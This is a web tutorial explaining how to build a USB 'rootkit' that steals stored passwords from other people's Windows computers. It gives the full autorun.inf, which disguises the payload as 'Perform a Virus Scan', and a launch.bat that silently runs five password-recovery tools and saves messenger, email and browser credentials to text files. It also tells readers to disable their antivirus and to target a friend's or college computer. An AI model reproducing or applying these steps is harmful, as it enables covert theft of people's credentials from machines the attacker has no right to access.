How To Hack Passwords Using USB Drive
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How to hack passwords using
USB Drive
Today
I will show you how to hack Passwords using an USB Pen Drive.
As
we all know, Windows stores most of the passwords which are used on a daily
basis,
including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger
etc.
Along
with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP
accounts and auto-complete passwords of many browsers like IE and Firefox.
There
exists many tools for recovering these passswords from their stored places.
Using
these tools and an USB pendrive you can create your own rootkit to hack
passwords
from your friend’s/college Computer.
We
need the following tools to create our rootkit:
MessenPass: Recovers the passwords of
most popular Instant Messenger programs:
MSN
Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant
Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail
PassView: Recovers
the passwords of the following email programs: Outlook
Express,
Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003
(POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail,
Mozilla Thunderbird, Group Mail Free.
Mail
PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!,
Gmail), if you use the associated programs of these accounts.
IE Passview: IE
PassView is a small utility that reveals the passwords stored by
Internet
Explorer browser. It supports the new Internet Explorer 7.0, as well as
older
versions of Internet explorer, v4.0 - v6.0
Protected
Storage PassView: Recovers all passwords
stored inside the Protected
Storage,
including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected
sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small
password recovery tool that allows you to view
the
user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox
displays the passwords stored in your current profile, but you can easily
select
to watch the passwords of any other Firefox profile. For each password entry,
the
following information is displayed: Record Index, Web Site, User Name,
Password,
User Name Field, Password Field, and the Signons filename.
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Here
is a step by step procedre to create the password hacking toolkit:
NOTE:
You must temporarily disable your antivirus before following these steps.
1.
Download all the 5 tools, extract them and copy only the executables(.exe
files)
into
your USB Pendrive.
ie:
Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into
your USB Drive.
2.
Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION=
Perform a Virus Scan
save
the Notepad and rename it from
New
Text Document.txt to autorun.inf
Now
copy theautorun.inf file onto your USB pendrive.
3.
Create another Notepad and write the following text onto it:
start
mspass.exe /stext mspass.txt
start
mailpv.exe /stext mailpv.txt
start
iepv.exe /stext iepv.txt
start
pspv.exe /stext pspv.txt
start
passwordfox.exe /stext passwordfox.txt
save
the Notepad and rename it from
New
Text Document.txt to launch.bat
Copy
the launch.bat file also to your USB drive.
Now
your rootkit is ready and you are all set to hack the passwords. You can use
this
pendrive
on your friend’s PC or on your college computer. Just follow these steps
1.
Insert the pendrive and the autorun window will pop-up. (This is because, we
have
created
an autorun pendrive).
2. In
the pop-up window, select the first option (Perform a Virus Scan).
3. Now
all the password hacking tools will silently get executed in the background
(This
process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4.
Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This
hack works on Windows 2000, XP,Vista and 7
NOTE:
This procedure will only recover the stored passwords (if any) on the
Computer.